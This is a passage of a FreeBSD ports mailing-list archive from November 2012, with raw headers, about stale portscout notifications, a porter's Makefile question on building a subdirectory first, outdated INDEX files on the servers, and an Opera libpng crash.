mod_mp3 mod_mylo mod_perl mod_proxy_add_forward mod_put mod_python mod_sed > mod_sequester mod_shapvh mod_sqlinclude mod_ticket mod_trigger > > mod_cvs -> removed but sends update requests for mod_cvs2 > mod_macro -> removed but sends updates for mod_macro22 > > > Thanks, > olli -- Ryan Steinmetz PGP: EF36 D45A 5CA9 28B1 A550 18CD A43C D111 7AD7 FAF2 From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 19:27:06 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 833465DD; Tue, 27 Nov 2012 19:27:06 +0000 (UTC) (envelope-from ohauer@FreeBSD.org) Received: from p578be941.dip0.t-ipconnect.de (p578be941.dip0.t-ipconnect.de [87.139.233.65]) by mx1.freebsd.org (Postfix) with ESMTP id 398218FC16; Tue, 27 Nov 2012 19:27:06 +0000 (UTC) Received: from [192.168.0.100] (cde1100.uni.vrs [192.168.0.100]) (Authenticated sender: ohauer) by p578be941.dip0.t-ipconnect.de (Postfix) with ESMTPSA id 7A16020908; Tue, 27 Nov 2012 20:27:03 +0100 (CET) Message-ID: <50B51405.6060209@FreeBSD.org> Date: Tue, 27 Nov 2012 20:27:01 +0100 From: Olli Hauer User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: ports@FreeBSD.org Subject: Re: Portscout Notification Emails References: <20121127150010.GA16470@exodus.zi0r.com> <50B50889.5040401@FreeBSD.org> <20121127192040.GD98092@exodus.zi0r.com> In-Reply-To: <20121127192040.GD98092@exodus.zi0r.com> X-Enigmail-Version: 1.4.6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Ryan Steinmetz X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 19:27:06 -0000 On 2012-11-27 20:20, Ryan Steinmetz wrote: > > On (11/27/12 19:38), Olli Hauer wrote: >> Hi Ryan, >> >> would you mind to start over with a current ports-tree *and* a fresh portscout >> DB, or do a cleanup and remove ports which are no longer in the tree? >> > > This has been resolved. Part of the bits that process deleted ports was > not working as expected. > Thanks! From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 20:22:52 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EBC5C23E; Tue, 27 Nov 2012 20:22:52 +0000 (UTC) (envelope-from lukasz@wasikowski.net) Received: from bijou.wasikowski.net (nat-131-34.man.bydgoszcz.pl [89.191.131.34]) by mx1.freebsd.org (Postfix) with ESMTP id 945768FC08; Tue, 27 Nov 2012 20:22:52 +0000 (UTC) Received: from bijou.wasikowski.net (localhost [127.0.0.1]) by bijou.wasikowski.net (Postfix) with ESMTP id 9A8F45C026; Tue, 27 Nov 2012 21:23:01 +0100 (CET) X-Virus-Scanned: amavisd-new at wasikowski.net Received: from bijou.wasikowski.net ([127.0.0.1]) by bijou.wasikowski.net (bijou.wasikowski.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id JE9SSqZCZ0eo; Tue, 27 Nov 2012 21:23:00 +0100 (CET) Received: from [192.168.168.1] (89-67-80-149.dynamic.chello.pl [89.67.80.149]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by bijou.wasikowski.net (Postfix) with ESMTPSA id 29F965C024; Tue, 27 Nov 2012 21:23:00 +0100 (CET) Message-ID: <50B5211A.1030005@wasikowski.net> Date: Tue, 27 Nov 2012 21:22:50 +0100 From: =?UTF-8?B?xYF1a2FzeiBXxIVzaWtvd3NraQ==?= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20121026 Thunderbird/16.0.2 MIME-Version: 1.0 To: Olli Hauer Subject: Re: Portscout Notification Emails References: <20121127150010.GA16470@exodus.zi0r.com> <50B50889.5040401@FreeBSD.org> In-Reply-To: <50B50889.5040401@FreeBSD.org> X-Enigmail-Version: 1.4.6 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Cc: ports@FreeBSD.org, Ryan Steinmetz X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 20:22:53 -0000 W dniu 2012-11-27 19:38, Olli Hauer pisze: > For example the following 42 ports are removed since 2012-01-01 but are listed > for apache@. > > apache-contrib apache13 apache13+ipv6 apache13-modperl apache13-ssl auth_ldap > mod_access_identd mod_access_referer mod_accounting mod_auth_cookie_mysql > mod_auth_external mod_auth_imap mod_auth_kerb mod_auth_mysql mod_auth_pam > mod_auth_pgsql mod_auth_useragent mod_backhand mod_bandwidth mod_bf > mod_blowchunks mod_bunzip2 mod_cgi_debug mod_color mod_curb mod_dav > mod_extract_forwarded_ap13 mod_filter mod_index_rss mod_layout mod_log_spread > mod_mp3 mod_mylo mod_perl mod_proxy_add_forward mod_put mod_python mod_sed > mod_sequester mod_shapvh mod_sqlinclude mod_ticket mod_trigger > > mod_cvs -> removed but sends update requests for mod_cvs2 > mod_macro -> removed but sends updates for mod_macro22 I'm maintaining mod_macro22 and I'm fine with e-mail updates. -- best regards, Lukasz Wasikowski From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 20:24:21 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 9A31249E for ; Tue, 27 Nov 2012 20:24:21 +0000 (UTC) (envelope-from prvs=671b5ceed=pschmehl_lists@tx.rr.com) Received: from ip-001.utdallas.edu (ip-001.utdallas.edu [129.110.20.107]) by mx1.freebsd.org (Postfix) with ESMTP id 696A58FC0C for ; Tue, 27 Nov 2012 20:24:21 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AtcFAKogtVCBbgogTmdsb2JhbABFhWO6UQMBASNLgl0CgWMaiCCeYYZVijqQQpAaYQOIXqB2 X-IronPort-AV: E=Sophos;i="4.84,174,1355119200"; d="scan'208";a="109294479" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-001.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 27 Nov 2012 14:24:14 -0600 Date: Tue, 27 Nov 2012 14:24:12 -0600 From: Paul Schmehl To: FreeBSD Ports List Subject: How to descend into the extract to build in a subdir Message-ID: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline; size=861 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 20:24:21 -0000 I'm working on a port that requires a separate ./configure and ./make to build libraries before you build the main source. How is this done in ports? I figure you have to do something in pre-build:, but I'm not sure exactly what. (cd ${WRKSRC}/subdir && ${MAKE}) causes make to fail entirely. I'm having trouble finding a comparable example in ports and there doesn't seem to be anything about it in the porters handbook (that I have found.) -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 20:31:45 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1CD8667E for ; Tue, 27 Nov 2012 20:31:45 +0000 (UTC) (envelope-from wblock@wonkity.com) Received: from wonkity.com (wonkity.com [67.158.26.137]) by mx1.freebsd.org (Postfix) with ESMTP id C7CAC8FC08 for ; Tue, 27 Nov 2012 20:31:44 +0000 (UTC) Received: from wonkity.com (localhost [127.0.0.1]) by wonkity.com (8.14.5/8.14.5) with ESMTP id qARKVh7L058719 for ; Tue, 27 Nov 2012 13:31:43 -0700 (MST) (envelope-from wblock@wonkity.com) Received: from localhost (wblock@localhost) by wonkity.com (8.14.5/8.14.5/Submit) with ESMTP id qARKVhtJ058716 for ; Tue, 27 Nov 2012 13:31:43 -0700 (MST) (envelope-from wblock@wonkity.com) Date: Tue, 27 Nov 2012 13:31:43 -0700 (MST) From: Warren Block To: freebsd-ports@freebsd.org Subject: INDEX files on servers outdated Message-ID: User-Agent: Alpine 2.00 (BSF 1167 2008-08-23) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.2.7 (wonkity.com [127.0.0.1]); Tue, 27 Nov 2012 13:31:43 -0700 (MST) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 20:31:45 -0000 The INDEX files on the FreeBSD servers are outdated. (on 9-stable, amd64) # svn up /usr/ports # cd /usr/ports # make fetchindex # grep ^firefox-1 INDEX-9 firefox-16.0.2,1|/usr/ports/www/firefox|/usr/local|Web browser based firefox-10.0.10,1|/usr/ports/www/firefox-esr|/usr/local|Web browser firefox was updated to 17.0 on November 20, almost a week ago. The old INDEX file can cause portupgrade and portmaster to not show available updates. Portmaster: # svn up /usr/ports # portmaster -L --index-only | egrep '(ew|ort) version|total install' ===>>> 791 total installed ports ===>>> There are no new versions available Portmaster does detect changes if --index-only is left out, but it takes much longer and so is not used by some users. Portupgrade: # portsdb -Fu && portversion -vl'<' # There is no indication to the user that the index file is outdated and should be rebuilt locally. (I think but have not verified that the index file retrieved by portsnap is correct.) I started to enter a PR for this, but realized it may be a known problem. If so, can we just delete the index files so fetchindex errors out instead of delivering an outdated file? From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 20:40:20 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 831A2845 for ; Tue, 27 Nov 2012 20:40:20 +0000 (UTC) (envelope-from ohauer@FreeBSD.org) Received: from p578be941.dip0.t-ipconnect.de (p578be941.dip0.t-ipconnect.de [87.139.233.65]) by mx1.freebsd.org (Postfix) with ESMTP id 392BA8FC08 for ; Tue, 27 Nov 2012 20:40:20 +0000 (UTC) Received: from [192.168.0.100] (cde1100.uni.vrs [192.168.0.100]) (Authenticated sender: ohauer) by p578be941.dip0.t-ipconnect.de (Postfix) with ESMTPSA id B9D3E20908; Tue, 27 Nov 2012 21:40:16 +0100 (CET) Message-ID: <50B5252F.4090102@FreeBSD.org> Date: Tue, 27 Nov 2012 21:40:15 +0100 From: Olli Hauer User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: FreeBSD Ports List Subject: Re: How to descend into the extract to build in a subdir References: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> In-Reply-To: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> X-Enigmail-Version: 1.4.6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Paul Schmehl X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 20:40:20 -0000 On 2012-11-27 21:24, Paul Schmehl wrote: > I'm working on a port that requires a separate ./configure and ./make to build libraries before you build the main source. How is this done in ports? > > I figure you have to do something in pre-build:, but I'm not sure exactly what. > (cd ${WRKSRC}/subdir && ${MAKE}) causes make to fail entirely. I'm having trouble finding a comparable example in ports and there doesn't seem to be anything about it in the porters handbook (that I have found.) > Hi Paul, you can overwrite also the whole build part with a do-build: target For example the devel/apr1 port has to build apr before apr-util. Maybe you can show your current Makefile -- Regards, olli From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 20:46:27 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 007E5B4B for ; Tue, 27 Nov 2012 20:46:26 +0000 (UTC) (envelope-from prvs=671b5ceed=pschmehl_lists@tx.rr.com) Received: from ip-002.utdallas.edu (ip-002.utdallas.edu [129.110.20.108]) by mx1.freebsd.org (Postfix) with ESMTP id B88408FC08 for ; Tue, 27 Nov 2012 20:46:26 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: ArYFAD0mtVCBbgogTmdsb2JhbABFwDQDAQEjS4IeAQEEATgCRAsLRkMUBhOIBwavbJBBjDqDYGEDiF6gdg X-IronPort-AV: E=Sophos;i="4.84,174,1355119200"; d="scan'208";a="103355370" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-002.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 27 Nov 2012 14:45:56 -0600 Date: Tue, 27 Nov 2012 14:45:54 -0600 From: Paul Schmehl To: FreeBSD Ports List Subject: Re: How to descend into the extract to build in a subdir Message-ID: In-Reply-To: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> References: <4B522159C9F77F81D968E64D@utd71538.campus.ad.utdallas.edu> X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline; size=1156 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 20:46:27 -0000 --On November 27, 2012 2:24:12 PM -0600 Paul Schmehl wrote: > I'm working on a port that requires a separate ./configure and ./make to > build libraries before you build the main source. How is this done in > ports? > > I figure you have to do something in pre-build:, but I'm not sure exactly > what. > (cd ${WRKSRC}/subdir && ${MAKE}) causes make to fail entirely. I'm > having trouble finding a comparable example in ports and there doesn't > seem to be anything about it in the porters handbook (that I have found.) Never mind. I figured it outl .if ${PORT_OPTIONS:MBROCCOLI} pre-configure: (cd ${WRKSRC}/aux/broccoli && ./configure) pre-build: (cd ${WRKSRC}/aux/broccoli && ${MAKE}) .endif -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 21:25:30 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 13A29851 for ; Tue, 27 Nov 2012 21:25:30 +0000 (UTC) (envelope-from hsn@filez.com) Received: from ponto.amerinoc.com (ponto.amerinoc.com [64.6.108.239]) by mx1.freebsd.org (Postfix) with ESMTP id 8C6CF8FC13 for ; Tue, 27 Nov 2012 21:25:29 +0000 (UTC) Received: from fbsd9.localdomain (205.83.broadband7.iol.cz [88.102.83.205]) (authenticated bits=128) by ponto.amerinoc.com (8.14.5/8.14.5) with ESMTP id qARLF6db041366 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Tue, 27 Nov 2012 22:15:09 +0100 (CET) (envelope-from hsn@filez.com) Received: from [127.0.0.1] ([10.0.0.1]) by fbsd9.localdomain (8.14.5/8.14.5) with ESMTP id qARLEvFj001115; Tue, 27 Nov 2012 22:14:58 +0100 (CET) (envelope-from hsn@filez.com) Message-ID: <50B4E664.6030606@filez.com> Date: Tue, 27 Nov 2012 17:12:20 +0100 From: Radim Kolar User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: portscout@portscout.zi0r.com, ports@freebsd.org Subject: Re: FreeBSD ports you maintain which are out of date References: <201211271554.qARFs9un067018@null.zi0r.com> In-Reply-To: <201211271554.qARFs9un067018@null.zi0r.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121127-1, 27.11.2012), Outbound message X-Antivirus-Status: Clean X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 21:25:30 -0000 can be this daily spam turned off? i emailed there portscout@portscout.freebsd.org but message was not delivered From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 21:40:50 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1044BCF9 for ; Tue, 27 Nov 2012 21:40:50 +0000 (UTC) (envelope-from lumiwa@gmail.com) Received: from mail-ie0-f182.google.com (mail-ie0-f182.google.com [209.85.223.182]) by mx1.freebsd.org (Postfix) with ESMTP id C27528FC0C for ; Tue, 27 Nov 2012 21:40:49 +0000 (UTC) Received: by mail-ie0-f182.google.com with SMTP id s9so15900983iec.13 for ; Tue, 27 Nov 2012 13:40:49 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject:date:user-agent:cc:references:in-reply-to :mime-version:content-type:content-transfer-encoding:message-id; bh=cUFd+eZ9jnbQSk7DLz1qqM65JnYOIBg2nLUsdHXWhZo=; b=vAKGq99bbtagQIAF8fYr0P0s162avNAsfbuSyXTMgkPyF7v7XhBdJQMiEr1Byv8APm YTGyLPXe2vwy5k4uvliE+39/QzHILrmfZk32QvzXCI+v77G1hpHyhVQOtGomFN0YFlZh VFw8z6MVaDl5CZ7ORV6ST86mbByZchsgInXIPwpuuF3Ye4/z9QNbVPe5FYMatSWxNPpX N7irRWazP5JC5MsnT8zMNfOidPremCNKKwulvIlwJRFro9OeMC6vILdn6F33lYuPussR ihj1bDBWFlZD45BxiQfOMJWImnJFlVo92uwEuaCVbkfaAH6N7zD4SKDwW0/2QQpfDNoE whVg== Received: by 10.42.101.144 with SMTP id e16mr15185967ico.5.1354052448959; Tue, 27 Nov 2012 13:40:48 -0800 (PST) Received: from luna.wi.rr.com (cpe-184-58-138-79.wi.res.rr.com. [184.58.138.79]) by mx.google.com with ESMTPS id az6sm2535747igb.11.2012.11.27.13.40.47 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 27 Nov 2012 13:40:48 -0800 (PST) From: ajtiM To: freebsd-ports@freebsd.org Subject: Re: opera 12.11 Date: Tue, 27 Nov 2012 15:40:38 -0600 User-Agent: KMail/1.13.7 (FreeBSD/9.1-RC3; KDE/4.8.4; i386; ; ) References: <201211270534.31383.lumiwa@gmail.com> <50B4C96D.9040109@pukruppa.de> In-Reply-To: <50B4C96D.9040109@pukruppa.de> MIME-Version: 1.0 Content-Type: Text/Plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <201211271540.39268.lumiwa@gmail.com> Cc: Peter Ulrich Kruppa X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 21:40:50 -0000 On Tuesday 27 November 2012 08:08:45 Peter Ulrich Kruppa wrote: > On 27.11.2012 12:34, ajtiM wrote: > > Hi! > > > > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my > > FreeBSD 9.1 RC-3 doen't works anymore: > > > > opera > > libpng error: incorrect data check > > libpng error: incorrect data check > > libpng error: incorrect data check > > Segmentation fault (core dumped) > > It is quite a while since, but did you update your graphics/png properly? > Please check /usr/ports/UPDATING 20120531 . > > Greetings > > Peter > > > Thanks in advance. > > > > P.S. > > > > I used Clang to build Opera. > > > > Mitja > > -------- > > http://www.redbubble.com/people/lumiwa > > _______________________________________________ > > freebsd-ports@freebsd.org mailing list > > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" As I remember I did portmaster -r png- and it build one day.... Opera 12.10 and before didn't have problems... Mitja -------- http://www.redbubble.com/people/lumiwa From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 23:13:48 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E687BD67 for ; Tue, 27 Nov 2012 23:13:48 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: from mail-ea0-f182.google.com (mail-ea0-f182.google.com [209.85.215.182]) by mx1.freebsd.org (Postfix) with ESMTP id 7418E8FC15 for ; Tue, 27 Nov 2012 23:13:48 +0000 (UTC) Received: by mail-ea0-f182.google.com with SMTP id a14so4370671eaa.13 for ; Tue, 27 Nov 2012 15:13:40 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=tm4jutwbvem71kVPLWbtRGJQyISME8ddzzlhpNDttbY=; b=yAJr2yJpRdBaAs21ACwodQ3U4KSLJyJabGuqnKpcOxguidOxiMaAVI6o1p8MvOOmiF AXL5Ntfa7BMbqrWzOjkMAISuSsnh+Y0kHMo5VS0MO0fcCn1Ua2W6be5W45bhCBdO99x8 hpjZHl7OXMStLb4U4RtxJ9hExv7IrbOXS+iIdQgtTa1Eyxkosz+5RTgoguNYEdkDfoVP r6ggTsqkz7Q9pLKZR6T/qKa/+EcayMBseGqJZgCPIMZYd0o4i8ebN46keOlPL1bmwdOi 2CvhgzQxbD5byJM3lVaE6HHTydvSxU8hF/VeKzOCrR1cP44Nxebh6kUesezGhR5MMtvE Ez7g== MIME-Version: 1.0 Received: by 10.14.175.198 with SMTP id z46mr63154790eel.26.1354058020660; Tue, 27 Nov 2012 15:13:40 -0800 (PST) Received: by 10.223.71.199 with HTTP; Tue, 27 Nov 2012 15:13:40 -0800 (PST) In-Reply-To: References: Date: Tue, 27 Nov 2012 15:13:40 -0800 Message-ID: Subject: Re: INDEX files on servers outdated From: Kevin Oberman To: Warren Block Content-Type: text/plain; charset=UTF-8 Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 23:13:49 -0000 On Tue, Nov 27, 2012 at 12:31 PM, Warren Block wrote: > The INDEX files on the FreeBSD servers are outdated. > > (on 9-stable, amd64) > > # svn up /usr/ports > # cd /usr/ports > # make fetchindex > # grep ^firefox-1 INDEX-9 > firefox-16.0.2,1|/usr/ports/www/firefox|/usr/local|Web browser based > firefox-10.0.10,1|/usr/ports/www/firefox-esr|/usr/local|Web browser > > firefox was updated to 17.0 on November 20, almost a week ago. > > The old INDEX file can cause portupgrade and portmaster to not show > available updates. > > Portmaster: > > # svn up /usr/ports > # portmaster -L --index-only | egrep '(ew|ort) version|total install' > ===>>> 791 total installed ports > ===>>> There are no new versions available > > Portmaster does detect changes if --index-only is left out, but it takes > much longer and so is not used by some users. > > Portupgrade: > > # portsdb -Fu && portversion -vl'<' > # > > There is no indication to the user that the index file is outdated and > should be rebuilt locally. (I think but have not verified that the index > file retrieved by portsnap is correct.) > > I started to enter a PR for this, but realized it may be a known problem. > If so, can we just delete the index files so fetchindex errors out instead > of delivering an outdated file? Looks like fall-out from the security incident. I hope they start being updated, but I am falling back to "portsdb -Uu" or "make -C /usr/ports index" to generate the index file. Not ideal and rather slow, but it works. As you surmised, portsnap is fine. I am now issuing a "portversion -vL=" so I'll know when the index builds start up again. -- R. Kevin Oberman, Network Engineer E-mail: kob6558@gmail.com From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 23:15:49 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id DC60EFED for ; Tue, 27 Nov 2012 23:15:49 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: from mail-ee0-f54.google.com (mail-ee0-f54.google.com [74.125.83.54]) by mx1.freebsd.org (Postfix) with ESMTP id 702568FC13 for ; Tue, 27 Nov 2012 23:15:49 +0000 (UTC) Received: by mail-ee0-f54.google.com with SMTP id c13so8972846eek.13 for ; Tue, 27 Nov 2012 15:15:48 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=tqZN/qdozhaGZb7Z0LII98CPW2BRkr602K97u3FXEYI=; b=CfJInmM5zCmbMxQjAWb4iCcMFsaVggsb776VTpl2AcfpWiAyeAKPyRCfIXdKFU71nw WzS41BAa1XPyYVvPftHbU46vrBZ2WpmSq7VyTu6IwQprsrxEr50CKfAQjvt0hrzre8ko wt6ddrB6O/ief8zS51LjCDZWfcQ9IRZcVnshP4W8rEV3Q6Nr6HQsEUdfZ3squGC5EhTI 7cZgNpR2U3pu7Cks8Xt2mjVKwxfe8JzeXANjMWEjgcjvQRmI4Ta2js2HhHLOLq0JTsLM XxoT977tZuWJK38zCmuy+9tmA6HairEUnvA0rrWN6Im1fYLlWcpLITw5h/dTrvOyW24r 0bGQ== MIME-Version: 1.0 Received: by 10.14.194.71 with SMTP id l47mr62807685een.6.1354058148409; Tue, 27 Nov 2012 15:15:48 -0800 (PST) Received: by 10.223.71.199 with HTTP; Tue, 27 Nov 2012 15:15:48 -0800 (PST) In-Reply-To: <50B4E664.6030606@filez.com> References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> Date: Tue, 27 Nov 2012 15:15:48 -0800 Message-ID: Subject: Re: FreeBSD ports you maintain which are out of date From: Kevin Oberman To: Radim Kolar Content-Type: text/plain; charset=UTF-8 Cc: ports@freebsd.org, portscout@portscout.zi0r.com X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 23:15:49 -0000 On Tue, Nov 27, 2012 at 8:12 AM, Radim Kolar wrote: > can be this daily spam turned off? i emailed there > > portscout@portscout.freebsd.org > > but message was not delivered It's not spam, but a very useful service. I you don't work on any ports, you should be able to filter it very easily with procmail or your mail reader. -- R. Kevin Oberman, Network Engineer E-mail: kob6558@gmail.com From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 23:24:33 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 4B4C18CE for ; Tue, 27 Nov 2012 23:24:33 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: from mail-ee0-f54.google.com (mail-ee0-f54.google.com [74.125.83.54]) by mx1.freebsd.org (Postfix) with ESMTP id C469A8FC08 for ; Tue, 27 Nov 2012 23:24:32 +0000 (UTC) Received: by mail-ee0-f54.google.com with SMTP id c13so8976044eek.13 for ; Tue, 27 Nov 2012 15:24:32 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=wjVB4jM7FabTlF3b/D67KrW/QTgYYeGpe0bfSn8VeWY=; b=D+sGmN2VtaEXknzyBZ4WkDiq+VyOeLei/EefnX4YHHX/RSFHKirem57Q7aPrHtlpO0 D+dys+EbLDTqySyVO1L66vdCJM8f6SvrqIhLxVHhJXbCdhhTcOZGEOGuThxJqxJqn+65 uENwXWmbNsix4AsgRUUlfYXPtxkI/2v/qB61SdY1g0EvEQwM1mS7oSjSVH2+dzCD5THo XFICqY9vrfMATaClssqFr/FcMW2+MRgqmBr/U3vrI3Dx4AScR1eP1NNTF6/SWhq4fiMq xcf00B1dfbzux0WANGT2qCMBLTZjL7U3rulXH1zc5q26Y7lkDGbUT+1/WqbTjDa6v30/ nP9Q== MIME-Version: 1.0 Received: by 10.14.209.193 with SMTP id s41mr25979204eeo.9.1354058671982; Tue, 27 Nov 2012 